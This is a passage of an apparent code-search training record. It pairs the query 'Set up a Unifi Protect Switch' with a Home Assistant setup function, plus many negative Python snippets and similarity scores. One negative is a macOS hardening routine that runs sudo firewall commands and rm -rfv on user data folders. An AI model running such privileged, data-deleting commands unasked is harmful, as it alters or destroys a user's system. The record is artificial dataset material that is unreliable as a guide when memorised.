+ outputLen, i].astype(np.int32))\n\t\"\"\"\n\n\tif decimate:\n\t\tprint(\"Decimating...\")\n\t\trollingSum = np.cumsum(dataOut, axis = 0)\n\t\tdataOut = rollingSum[decimate::decimate, :] - rollingSum[:-decimate:decimate, :]\n\n\n\tprint(\"Plotting...\")\n\tplt.figure(figsize = (24,12))\n\tplt.imshow(dataOut.T, aspect = 'auto', vmax = np.percentile(dataOut, 95), vmin = np.percentile(dataOut, 33))\n\tplt.savefig(f'./debugfull_{datetime.datetime.now().isoformat()}.png')\n\n\tplt.figure(figsize = (24,12))\n\tplt.imshow(np.log10(dataOut.T), aspect = 'auto', vmax = np.log10(np.percentile(dataOut, 95)), vmin = np.log10(np.percentile(dataOut, 33)))\n\tplt.savefig(f'./debugfull2_{datetime.datetime.now().isoformat()}.png')\n\t\n\tplt.figure(figsize = (24,12))\n\td1 = dataOut[:, :100].sum(axis = 1)\n\td1 -= np.mean(d1, dtype = np.int64)\n\td2 = dataOut[:, 100:200].sum(axis = 1)\n\td2 -= np.mean(d2, dtype = np.int64)\n\td3 = dataOut[:, 200:300].sum(axis = 1)\n\td3 -= np.mean(d3, dtype = np.int64)\n\td4 = dataOut[:, 300:].sum(axis = 1)\n\td4 -= np.mean(d4, dtype = np.int64)\n\tplt.plot(d1, alpha = 0.3, label = '1')\n\tplt.plot(d2, alpha = 0.3, label = '2')\n\tplt.plot(d3, alpha = 0.3, label = '3')\n\tplt.plot(d4, alpha = 0.3, label = '4')\n\tplt.legend()\n\tplt.savefig(f'./debug_{datetime.datetime.now().isoformat()}.png')\n\n\tprint(\"Done!\")", "def sample_delay(self, which):\n return _spacegrant_swig.binary_sink_sptr_sample_delay(self, which)", "def IRC_send_called_every_three_seconds(self):\n\n if (self.ircMessageBuffer):\n 
try:\n # print(\"Buffered\")\n stringToSend = str(self.ircMessageBuffer.popleft())\n print(\"string to send : \" + stringToSend)\n if self.ircSocket:\n self.ircSocket.send((stringToSend).encode('utf8'))\n except Exception as e:\n logging.error(\"IRC send error:\")\n logging.error(\"In IRCSendCalledEveryThreeSeconds\")\n logging.error(str(e))\n logging.exception(\"Exception : \")", "def send_event(self, dsts):\n\n # get a list of the port numbers to send a message to\n if dsts: \n dsts_copy = dsts\n dsts = [socket_connections[clock_id] for clock_id in dsts] \n\n self.send_event_helper(dsts)\n\n # keep track of the logical clock time when the message was sent\n # so that it can be put in the log\n cur_time = self.clock_time\n\n # update the logical clock time\n self.clock_time += 1\n\n # log sending the message\n self.log(\" Sending to \" + str(dsts_copy) + \" at LC time: \" + str(cur_time))", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.hdlc_framer_sptr_declare_sample_delay(self, *args)", "def run(self):\n\n # self.peripheral.connect(self.address)\n\n # //-set the delegate to handle notification message process\n # self.peripheral.setDelegate(MyDelegate(self.sinOut))\n if self._type == \"BW\":\n uuid = \"0000fff0-0000-1000-8000-00805f9b34fb\" # the bought module distinguished by the name.\n # BW means the bought module's name \"BW-ECG-01\".\n svc = self.peripheral.getServiceByUUID(uuid)\n\n # //-the characteristic that data can be written to\n chr_of_writable = svc.getCharacteristics()[0]\n # //-the characteristic that receives notification from other peripheral.\n chr_of_notify = svc.getCharacteristics()[1]\n # //-enable the notify\n self.peripheral.writeCharacteristic(chr_of_notify.valHandle + 1, struct.pack('<bb', 0x01, 0x00), True)\n # //-bind user ID to BW-ECG-01, the ID could be a random ID.\n chr_of_writable.write(b'\\xE8\\x41\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00',\n True)\n # //-start the acquiring, a time(Y/M/D/H/H/S/deltaT) should be given. the time could be a random time\n # //-but the delta T should have meaning which is the acquiring time. 
0x01 means 1 minutes.\n # //-the delta T could be modified as other number, this could be done by UI.\n # //-if the number could be set by user, that will be perfection.\n chr_of_writable.write(b'\\xE8\\x23\\x15\\x03\\x0b\\x10\\x15\\x00\\x00\\x01', True)\n # //-start continually acquiring\n chr_of_writable.write(b'\\xE8\\20', True)\n\n while self.working:\n if self.peripheral.waitForNotifications(1.0):\n # print(\"notification:\")\n continue\n else:\n uuid = \"f000fff0-0451-4000-b000-000000000000\" # the module made by ourselves\n svc = self.peripheral.getServiceByUUID(uuid)\n ch = svc.getCharacteristics()[0]\n self.peripheral.writeCharacteristic(ch.valHandle + 1, struct.pack('<bb', 0x01, 0x00))\n # print(\"waiting...\")\n # self.sinOut.emit(\"waiting...\")\n\n while self.working:\n if self.peripheral.waitForNotifications(1.0):\n # print(\"notification:\")\n continue", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.invert_bit_sptr_declare_sample_delay(self, *args)", "def delay():\r\n time.sleep(2)", "def deepsleep(time_ms: int = None) -> None:", "def send(cls,event):\n for rcv in list(cls.getReceivers(event.sender)):\n if event.consumed:\n break\n rcv(event)", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.hdlc_deframer_sptr_declare_sample_delay(self, *args)", "def wake_up(self):\n self._write.send(b'1')", "def sleep(self,secs):\r\n d = Deferred()\r\n self.reactor.callLater(secs,d.callback,'Sleeping')\r\n return d", "def sleep(self,secs):\r\n d = Deferred()\r\n self.reactor.callLater(secs,d.callback,'Sleeping')\r\n return d", "def discover(self, seconds=3):\n log.info(\"Discovering devices\")\n self.upnp.broadcast(seconds)", "def declare_sample_delay(self, *args) -> \"void\":\n return _beamforming_swig.doaesprit_sptr_declare_sample_delay(self, *args)", "def _delayandsum4(data, offsets, ifactor2, steeramp, out, autopower):\n gridsize, numchannels = offsets.shape\n num = out.shape[0]\n for n in nb.prange(num):\n for gi in nb.prange(gridsize):\n out[n,gi] = 0\n autopower[n,gi] = 0\n for mi in range(numchannels):\n ind = offsets[gi,mi]\n r = (data[ind+n,mi] * (1-ifactor2[gi,mi]) \\\n + data[ind+n+1,mi] * ifactor2[gi,mi]) * steeramp[gi,mi]\n out[n,gi] += r\n autopower[n,gi] += r*r", "def delayed_generic_s21(params, f):\n return cable_delay(params, f) * generic_s21(params, f)", "def sleep_after(self, seconds):\n if self._firmware >= 264:\n self.write(self.ASCII_ESC, '8', seconds, seconds >> 8)\n else:\n self.write(self.ASCII_ESC, '8', seconds)", "def broadcast(self, txt):\n for chan in self.state['joinedchannels']:\n self.say(chan, txt)", "def send_outgoing_c2d_messages_thread(self):\n logger.info(\"Starting thread\")\n\n while not (self.done.isSet() and self.outgoing_c2d_queue.empty()):\n reset_watchdog()\n\n try:\n outgoing_c2d = self.outgoing_c2d_queue.get(timeout=1)\n except queue.Empty:\n pass\n else:\n device_id = outgoing_c2d.device_id\n message = outgoing_c2d.message\n props = outgoing_c2d.props\n device_data = self.device_list.try_get(device_id)\n run_id = device_data.run_id if device_data else None\n\n start = time.time()\n try:\n self.registry_manager.send_c2d_message(device_id, message, props)\n except Exception as e:\n logger.error(\n \"send_c2d_message to {} raised {}. Dropping. \".format(\n device_id, str(e) or type(e)\n ),\n exc_info=e,\n extra=custom_props(device_id, run_id),\n )\n else:\n end = time.time()\n if end - start > 2:\n logger.warning(\n \"Send throttled. 
Time delta={} seconds\".format(end - start),\n extra=custom_props(device_id, run_id),\n )", "def transmission_scheduler(self, ap_index:int):\n # sched_load = False\n # next_transmission_time = 0\n # current_sq = self.rec_reg.read()[ap_index]\n \n # for i in range(len(self.sch.queue)):\n # if self.sch.queue[i][1] == 4:\n # sched_load = True\n # next_transmission_time = self.sch.queue[i][0]\n # break\n \n # sched_args = list()\n # time_deadlines = list()\n \n # if sched_load:\n # time_sum = next_transmission_time + self.transmit_freq/2 \n # else:\n # time_sum = time.time()\n \n # #prebuild a list of transmission events and times for efficient entry into the scheduler\n # while True:\n # # delay added at start to avoid race between transmit() trying to read from the queue \n # # and the scheduler filling the queue\n # time_sum += self.transmit_freq\n # try:\n # # session queue of type bitarray\n # sched_args.append(current_sq.next())\n # # delete session queue object when the full queue is added to the scheduler\n # except ValueError:\n # # disconnect signal for transmit\n # time_deadlines.append(time_sum)\n # sched_args.append(None)\n # break\n # time_deadlines.append(time_sum)\n \n # #enter transmission events into the scheduler\n # for i in enumerate(time_deadlines):\n # self.sch.enterabs(time_deadlines[i], 4, self.transmit, \n # argument=(ap_index,sched_args[i]), kwargs={})\n # #print_queue(self.s.queue)\n # self.log.info(\"Scheduled transmission events for AP: %s\", ap_index)\n # self.log.info(\"Estimated transmission duration (s): %s\", \n # self.sch.queue[len(self.sch.queue)-1][0]-self.sch.queue[0][0])", "async def module_delay_event(self, delay: Union[int, float], event: str, ctx: Context, *args, **kwargs):\n self.logger.debug(f\"Delaying event {event} for {delay} seconds\")\n await asyncio.sleep(delay)\n await self.module_send_event(event, ctx, *args, **kwargs)", "def _send(self, frame):\n \n self.device.write(frame)", "def declare_sample_delay(self, *args):\n return _spacegrant_swig.message_debug_sptr_declare_sample_delay(self, *args)", "def broadcast(msg):\r\n for user in clients:\r\n msg_client(msg, user)" ]
[ "0.5880643", "0.56571025", "0.55984133", "0.5559285", "0.5533061", "0.54948366", "0.54706526", "0.5467734", "0.5466112", "0.54435146", "0.5429417", "0.5395709", "0.53661245", "0.5351861", "0.5349273", "0.53445977", "0.5340805", "0.533384", "0.5331035", "0.5317365", "0.5315561", "0.5306017", "0.53040284", "0.5283815", "0.52828276", "0.5275872", "0.5268948", "0.52627057", "0.52599937", "0.525916", "0.5256987", "0.5253164", "0.52453303", "0.5240753", "0.52359444", "0.5230384", "0.52265245", "0.521548", "0.5196707", "0.51887083", "0.5184638", "0.5184442", "0.5176369", "0.51755476", "0.5173855", "0.51737994", "0.51594937", "0.51561874", "0.5150906", "0.51457036", "0.51432675", "0.51386535", "0.5138301", "0.5131315", "0.513116", "0.5128994", "0.5124785", "0.5122888", "0.51118773", "0.51067793", "0.50968504", "0.50913244", "0.5087137", "0.5075151", "0.5074254", "0.50732374", "0.5070124", "0.50686556", "0.50611013", "0.5054597", "0.5052765", "0.5050357", "0.5050011", "0.5047517", "0.5043926", "0.5041538", "0.50390154", "0.5029922", "0.50297916", "0.5028933", "0.5020091", "0.50168985", "0.49972898", "0.49918672", "0.49846566", "0.49840346", "0.4983819", "0.4981708", "0.4981708", "0.4979034", "0.49731869", "0.49685946", "0.49639985", "0.49502608", "0.4948472", "0.49421236", "0.49389425", "0.4938251", "0.49342766", "0.4930372", "0.492468" ]
0.0
-1
Set up a Unifi Protect Switch.
async def async_setup_platform(hass, config, async_add_entities, _discovery_info=None): upv = hass.data[UPV_DATA]["upv"] coordinator = hass.data[UPV_DATA]["coordinator"] if not coordinator.data: return ir_on = config.get(CONF_IR_ON) if ir_on == "always_on": ir_on = "on" ir_off = config.get(CONF_IR_OFF) if ir_off == "led_off": ir_off = "autoFilterOnly" elif ir_off == "always_off": ir_off = "off" switches = [] for switch_type in config.get(CONF_MONITORED_CONDITIONS): for camera in coordinator.data: switches.append( UnifiProtectSwitch(coordinator, upv, camera, switch_type, ir_on, ir_off) ) async_add_entities(switches, True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, coordinator, upv, camera, switch_type, ir_on, ir_off):\n self.coordinator = coordinator\n self.upv = upv\n self._camera_id = camera\n self._camera = self.coordinator.data[camera]\n self._name = \"{0} {1} {2}\".format(\n DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera[\"name\"]\n )\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._icon = \"mdi:{}\".format(SWITCH_TYPES.get(switch_type)[1])\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._camera_type = self._camera[\"type\"]\n self._attr = SWITCH_TYPES.get(switch_type)[2]\n self._switch_type = SWITCH_TYPES.get(switch_type)[2]\n _LOGGER.debug(\"UnifiProtectSwitch: %s created\", self._name)\n _LOGGER.debug(\n \"UnifiProtectSwitch: IR_ON %s IR_OFF %s\", self._ir_on_cmd, self._ir_off_cmd\n )", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n entry_data = hass.data[DOMAIN][entry.entry_id]\n upv_object = entry_data[\"upv\"]\n protect_data = entry_data[\"protect_data\"]\n server_info = entry_data[\"server_info\"]\n\n if not protect_data.data:\n return\n\n ir_on = entry.data[CONF_IR_ON]\n if ir_on == \"always_on\":\n ir_on = \"on\"\n\n ir_off = entry.data[CONF_IR_OFF]\n if ir_off == \"led_off\":\n ir_off = \"autoFilterOnly\"\n elif ir_off == \"always_off\":\n ir_off = \"off\"\n\n switches = []\n for switch, switch_type in SWITCH_TYPES.items():\n required_field = switch_type[_SWITCH_REQUIRES]\n for camera_id in protect_data.data:\n # Only Add Switches if Camera supports it.\n if required_field and not protect_data.data[camera_id].get(required_field):\n continue\n\n switches.append(\n UnifiProtectSwitch(\n upv_object,\n protect_data,\n server_info,\n camera_id,\n switch,\n ir_on,\n ir_off,\n )\n )\n _LOGGER.debug(\"UNIFIPROTECT SWITCH CREATED: %s\", switch)\n\n async_add_entities(switches)", "def __init__(self, data, camera, switch_type):\n self.data = data\n self._camera_id = camera\n self._camera = self.data.devices[camera]\n self._name = \"{0} {1} {2}\".format(DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera[\"name\"])\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._icon = \"mdi:{}\".format(SWITCH_TYPES.get(switch_type)[1])\n self._state = STATE_OFF\n self._camera_type = self._camera[\"type\"]\n self._attr = SWITCH_TYPES.get(switch_type)[2]\n _LOGGER.debug(\"UnifiProtectSwitch: %s created\", self._name)", "def __init__(\n self, upv_object, protect_data, server_info, camera_id, switch, ir_on, ir_off\n ):\n super().__init__(upv_object, protect_data, server_info, camera_id, switch)\n self.upv = upv_object\n switch_type = SWITCH_TYPES[switch]\n self._name = f\"{switch_type[_SWITCH_NAME]} {self._camera_data['name']}\"\n self._icon = f\"mdi:{switch_type[_SWITCH_ICON]}\"\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._switch_type = switch_type[_SWITCH_TYPE]", "def setupHw():\n\n pin.setupHw()\n pin.setupOutPins(traffic_lights)\n pin.setDebug(False)", "def initialize_heating_pin(pi, pin):\n pi.set_pull_up_down(pin, pigpio.PUD_DOWN)", "def setup():\n print('Setup option is not working')\n quit()\n print('Long press the reset button until the blue Led is blinking quickly')\n print('Long press again until blinking slowly')\n print('Manually connect this device to the Wifi SSID named BlroadlinkProv')\n print('Press security mode (0 = none, 1 = WEP, 2 = WPA1, 3 = WPA2, 4 = WPA1/2)')\n print('Default:3')\n\n security = raw_input('Security mode:').lower()\n\n if security == 'none':\n 
security = 0\n elif security == 'wep':\n security = 1\n elif security == 'wpa1':\n security = 2\n elif (security == 'wpa2') or (security == ''):\n security = 3\n elif security == 'wpa1/2':\n security = 4\n security = int(security)\n if not(0 <= security <= 4):\n raise IndexError\n\n ssid = raw_input('SSID of your router :')\n if security != 0:\n password = raw_input('Password:')\n else:\n password = ''\n broadlink.setup(ssid, password, security)", "def setup(self):\n self.log.debug('RFSwitch - in RFSwitch setup()')\n # Add resource setup code here\n print(\"Calling RFSwitch:setup\")", "async def async_setup_platform(hass, config, async_add_entities, _discovery_info=None):\n data = hass.data[UPV_DATA]\n if not data:\n return\n\n switches = []\n for switch_type in config.get(CONF_MONITORED_CONDITIONS):\n for camera in data.devices:\n switches.append(UnifiProtectSwitch(data, camera, switch_type))\n\n async_add_entities(switches, True)", "def ipmi_setup():\n\n verify_ipmi_user_parm_accepted()", "def set_wep(self, pardus_profile):\n\n self.auth_alg = \"open\" #TODO: or 'shared' ??\n self.key_mgmt = \"None\" # Which stands for WEP based key management\n self.wep_key0 = str(pardus_profile.get_auth_password()) # Default index\n self.wep_key_type = \"1\" # Interpret WEP keys as hex or ascii keys", "def __init__(self):\n GPIO.setwarnings(False)\n GPIO.cleanup() # Reset the high and low levels of the GPIO port\n #The following code defines the GPIO used to control the L298N chip. This definition is different for different Raspberry Pi driver boards.\n self.Motor_A_EN = 17\n self.Motor_B_EN = 4\n self.Motor_A_Pin1 = 27\n self.Motor_A_Pin2 = 18\n self.Motor_B_Pin1 = 21\n self.Motor_B_Pin2 = 26\n self.setup()", "async def async_setup_entry(\n hass: HomeAssistant,\n entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n data: ProtectData = hass.data[DOMAIN][entry.entry_id]\n\n async def _add_new_device(device: ProtectAdoptableDeviceModel) -> None:\n entities = async_all_device_entities(\n data,\n ProtectSwitch,\n camera_descs=CAMERA_SWITCHES,\n light_descs=LIGHT_SWITCHES,\n sense_descs=SENSE_SWITCHES,\n lock_descs=DOORLOCK_SWITCHES,\n viewer_descs=VIEWER_SWITCHES,\n ufp_device=device,\n )\n entities += async_all_device_entities(\n data,\n ProtectPrivacyModeSwitch,\n camera_descs=[PRIVACY_MODE_SWITCH],\n ufp_device=device,\n )\n async_add_entities(entities)\n\n entry.async_on_unload(\n async_dispatcher_connect(hass, _ufpd(entry, DISPATCH_ADOPT), _add_new_device)\n )\n\n entities: list[ProtectDeviceEntity] = async_all_device_entities(\n data,\n ProtectSwitch,\n camera_descs=CAMERA_SWITCHES,\n light_descs=LIGHT_SWITCHES,\n sense_descs=SENSE_SWITCHES,\n lock_descs=DOORLOCK_SWITCHES,\n viewer_descs=VIEWER_SWITCHES,\n )\n entities += async_all_device_entities(\n data,\n ProtectPrivacyModeSwitch,\n camera_descs=[PRIVACY_MODE_SWITCH],\n )\n\n if (\n data.api.bootstrap.nvr.can_write(data.api.bootstrap.auth_user)\n and data.api.bootstrap.nvr.is_insights_enabled is not None\n ):\n for switch in NVR_SWITCHES:\n entities.append(\n ProtectNVRSwitch(\n data, device=data.api.bootstrap.nvr, description=switch\n )\n )\n async_add_entities(entities)", "def _setup(self):\n if self._setup:\n return\n\n GPIO.setmode(GPIO.BCM)\n for i in (self.on, self.off):\n GPIO.setup(i, GPIO.OUT)\n self.stop_all()\n Outlet._setup = True", "def __init__(self):\n\n GPIO.setup(PIN_BTN, GPIO.IN, GPIO.PUD_UP)\n GPIO.setup(PIN_RED_LED_0, GPIO.OUT, GPIO.LOW)\n GPIO.setup(PIN_BLUE_LED, GPIO.OUT, GPIO.LOW)", "def 
__init__(self, user, server, port=80, model='motorized'):\n import pigpio\n self.user = user\n self.server, self.port = server, port\n self.model = model\n self.serial = self.get_serial()\n self.lock_id = self.get_lock_id()\n self.pi = pigpio.pi()\n self.avail_actions = {\n 'unlock': 600,\n 'lock': 2400,\n }", "def setProtectSurfaces():\n dislin.shlsur()", "def init(self):\n self.connect_to_switches()\n self.reset_states()", "def setup(self):\n self.pi.set_pull_up_down(self.gpio, pigpio.PUD_OFF)\n self.pi.set_watchdog(self.gpio, 0)\n self.register_callbacks()", "def lockdown_procedure():\n\tprint(\"----------\")\n\tprint_section_header(\"LOCKDOWN\", Fore.BLUE)\n\tprint_confirmation(\"Set secure configuration without user interaction.\")\n\n\t# Get sudo priv\n\tsp.run(\"sudo -E -v\", shell=True, stdout=sp.PIPE)\n\n\t####\n\t# FIREWALL\n\t####\n\n\tsp.run(['sudo', 'launchctl', 'load', '/System/Library/LaunchDaemons/com.apple.alf.agent.plist'], stdout=sp.PIPE)\n\tsp.run(['sudo', 'launchctl', 'load', '/System/Library/LaunchAgents/com.apple.alf.useragent.plist'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setglobalstate', 'on'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setloggingmode', 'on'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setstealthmode', 'on'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setallowsigned', 'off'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setallowsignedapp', 'off'], stdout=sp.PIPE)\n\tsp.run(['sudo', 'pkill', '-HUP', 'socketfilterfw'], stdout=sp.PIPE)\n\n\t####\n\t# SYSTEM PROTECTION\n\t####\n\n\tsp.run('sudo spctl --master-enable', shell=True, stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setallowsigned', 'off'], stdout=sp.PIPE)\n\tsp.run(['sudo', '/usr/libexec/ApplicationFirewall/socketfilterfw', '--setallowsignedapp', 'off'], stdout=sp.PIPE)\n\tsp.run(['sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.captive.control Active -bool false'], stdout=sp.PIPE)\n\n\t####\n\t# METADATA STORAGE\n\t####\n\n\tsp.run(['rm', '-rfv', '\"~/Library/LanguageModeling/*\"', '\"~/Library/Spelling/*\"', '\"~/Library/Suggestions/*\"'])\n\tsp.run(['rm', '-rfv', '\"~/Library/Application Support/Quick Look/*\"'], stdout=sp.PIPE)\n\tsp.run([':>~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2'], shell=True, stdout=sp.PIPE)\n\n\t####\n\t# USER SAFETY\n\t####\n\n\tsp.run(['defaults', 'write', 'com.apple.screensaver', 'askForPassword', '-int', '1'], stdout=sp.PIPE)\n\tsp.run(['defaults', 'write', 'com.apple.screensaver', 'askForPasswordDelay', '-int', '0'], stdout=sp.PIPE)\n\tsp.run(['defaults', 'write', 'NSGlobalDomain', 'AppleShowAllExtensions', '-bool', 'true'], stdout=sp.PIPE)\n\tsp.run(['defaults', 'write', 'NSGlobalDomain', 'NSDocumentSaveNewDocumentsToCloud', '-bool', 'false'], stdout=sp.PIPE)\n\tsp.run(['defaults', 'write', 'com.apple.finder', 'AppleShowAllFiles', '-boolean', 'true'], shell=True, stdout=sp.PIPE)\n\tsp.run(['killAll', 'Finder'], stdout=sp.PIPE)\n\n\t####\n\t# RESTART\n\t####\n\n\tfinal_configuration()", "def __init__(self, name, device, sensor_type, nvrdata):\n self._name = name\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._device = device\n self._sensor_type = sensor_type\n self._nvrdata = nvrdata\n self._icon = 
\"mdi:{}\".format(SENSOR_TYPES.get(self._sensor_type)[2])\n self._state = device[\"recording_mode\"]\n self._camera_type = device[\"type\"]\n self._attr = SENSOR_TYPES.get(self._sensor_type)[3]\n _LOGGER.debug(\"UnifiProtectSensor: %s created\", self._name)", "def set_up_wireless_security(self, pardus_profile):\n\n if pardus_profile.get_auth() in [\"wep\", \"wepascii\"]:\n self.set_wep(pardus_profile)\n elif pardus_profile.get_auth() == \"wpa-psk\":\n self.set_wpa(pardus_profile)\n else:\n return", "def cryptsetup_open(config):\n\n (password, slot) = config.first_password()\n\n args = [\"luksOpen\", config.image_path(), config.device_name()]\n\n cryptsetup(args, password)", "def init_switches(inds):\n for i in inds:\n GPIO.setup(i, GPIO.OUT, initial=0)", "def turn_off(self):\n self._state = False\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":0 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'): \n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":0 }', 5)", "def setUp(self):\n #if UI object not found. the watcher method will be invoked\n d.watcher('AUTO_FC_WHEN_ANR').when(text='ANR').when(text='强行关闭') .press('enter')\n d.wakeup() #wakeup device ", "def __init__(self, parent, endpoint):\n Wemo_Endpoint.__init__(self, parent, endpoint)\n self.device_type = self._Parent._DeviceTypes.get('wemo_switch')\n self.FEATURES.update({\n FEATURE_BRIGHTNESS: False,\n FEATURE_PERCENT: False,\n FEATURE_NUMBER_OF_STEPS: False\n })", "def setLowPassU(new_low_pass_u):\n return RoboCaller().call(\"setLowPassU\", \"void\", new_low_pass_u * 1000)", "def _init_hardware(self):\n return", "def setup_fan():\n global dev_fan\n dev_fan = iot_fan.Fan(config.option('pin_name', 'Fan'))\n fan_init()", "def teleopInit(self):\n self.myRobot.setSafetyEnabled(True)", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n entry_data = hass.data[DOMAIN][entry.entry_id]\n upv_object = entry_data[\"upv\"]\n protect_data = entry_data[\"protect_data\"]\n server_info = entry_data[\"server_info\"]\n if not protect_data.data:\n return\n\n sensors = []\n for camera_id in protect_data.data:\n camera_data = protect_data.data[camera_id]\n if camera_data[\"type\"] == DEVICE_TYPE_DOORBELL:\n sensors.append(\n UnifiProtectBinarySensor(\n upv_object,\n protect_data,\n server_info,\n camera_id,\n DEVICE_TYPE_DOORBELL,\n )\n )\n _LOGGER.debug(\n \"UNIFIPROTECT DOORBELL SENSOR CREATED: %s\",\n camera_data[\"name\"],\n )\n\n sensors.append(\n UnifiProtectBinarySensor(\n upv_object, protect_data, server_info, camera_id, DEVICE_TYPE_MOTION\n )\n )\n _LOGGER.debug(\"UNIFIPROTECT MOTION SENSOR CREATED: %s\", camera_data[\"name\"])\n\n async_add_entities(sensors)\n\n return True", "def setup(wlan_type, wlan_name, alias, password, log_level):\n if alias is None:\n alias = click.prompt('Alias')\n if wlan_name is None:\n wlan_name = click.prompt(\"Wlan_name\")\n if wlan_type is None:\n wlan_type = click.prompt(\"Wlan-type\", type=click.Choice(['0', '1', '2', '3']))\n if wlan_type != '0' and password is None:\n password = getpass()\n setup_logging(log_level)\n wlan_type = int(wlan_type)\n tcp_setup(wlan_type, wlan_name, alias, password)", "def __init__(self,\n device_name,\n create_device_func,\n props,\n hub_name_prop,\n primary_port_prop,\n secondary_port_prop,\n 
ethernet_switch_prop,\n ethernet_port_prop,\n get_switchboard_if_initialized,\n power_and_data_share_cable=False,\n pre_off_func=None):\n super().__init__(device_name=device_name)\n\n self._create_device_func = create_device_func\n self._hub_name_prop = hub_name_prop\n self._primary_port_prop = primary_port_prop\n self._secondary_port_prop = secondary_port_prop\n self._props = props\n self._ethernet_switch = None\n\n # Set the properties\n self._get_switchboard_if_initialized = get_switchboard_if_initialized\n self._power_and_data_share_cable = power_and_data_share_cable\n self._pre_off_func = pre_off_func\n self._ethernet_switch_prop = ethernet_switch_prop\n self._ethernet_port_prop = ethernet_port_prop", "def __init__(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pin,GPIO.OUT)", "def init(self):\n self.reset()\n\n self.__interface.send_command('POWER_SETTING')\n self.__interface.send_data(0x37)\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('PANEL_SETTING')\n self.__interface.send_data(0xCF)\n self.__interface.send_data(0x08)\n\n self.__interface.send_command('BOOSTER_SOFT_START')\n self.__interface.send_data(0xc7)\n self.__interface.send_data(0xcc)\n self.__interface.send_data(0x28)\n\n self.__interface.send_command('POWER_ON')\n self.wait_until_idle()\n\n self.__interface.send_command('PLL_CONTROL')\n self.__interface.send_data(0x3c)\n\n self.__interface.send_command('TEMPERATURE_CALIBRATION')\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('VCOM_AND_DATA_INTERVAL_SETTING')\n self.__interface.send_data(0x77)\n\n self.__interface.send_command('TCON_SETTING')\n self.__interface.send_data(0x22)\n\n self.__interface.send_command('TCON_RESOLUTION')\n self.__interface.send_data(0x02) #source 640\n self.__interface.send_data(0x80)\n self.__interface.send_data(0x01) #gate 384\n self.__interface.send_data(0x80)\n\n self.__interface.send_command('VCM_DC_SETTING')\n self.__interface.send_data(0x1E) #decide by LUT file\n\n self.__interface.send_command(0xe5, False) #FLASH MODE\n self.__interface.send_data(0x03)", "def __init__(self, mb_info, switch_config):\n self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM)\n self.iop_switch_config = switch_config", "def switch_setup(params, rig, ik_joints):\n\n # Duplicate for bind skeleton\n skeleton = [x.name() for x in params['ikSkeleton']]\n bind_skeleton = cmds.duplicate(skeleton, n=skeleton[0] + '_bnd_0')\n #bind_skeleton\n\n # Hide all attribute on Controller\n fkikcontrol = params['fkIkSwitch'].name()\n attrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n for i in attrs:\n cmds.setAttr('{node}.{attr}'.format(node=fkikcontrol, attr=i), k=False, cb=False)\n\n # Create FK/IK Switch attributes\n cmds.addAttr(fkikcontrol, sn='FKIKBlend', at='float', min=0, max=1, dv=0, k=True)\n cmds.addAttr(fkikcontrol, sn='AutoVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='FKVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='IKVis', at='bool', dv=1, k=True)\n\n # create control offset transforms\n # par = cmds.listRelatives(fkikcontrol, parent=True)\n # buf = create_offset_transform(fkikcontrol, BUF)\n # cmds.parent(fkikcontrol, buf)\n # if par: cmds.parent(buf, par[0])\n\n # Parent Skeleton to rig group\n ik_skeleton = [x.name() for x in params['ikSkeleton']]\n fk_skeleton = [x.name() for x in params['fkSkeleton']]\n cmds.parent(ik_skeleton[0], rig['rigGroup'])\n cmds.parent(fk_skeleton[0], rig['rigGroup'])\n\n # Constraint Bind Skeleton\n fk_ik_finish(ik_joints, bind_skeleton, 
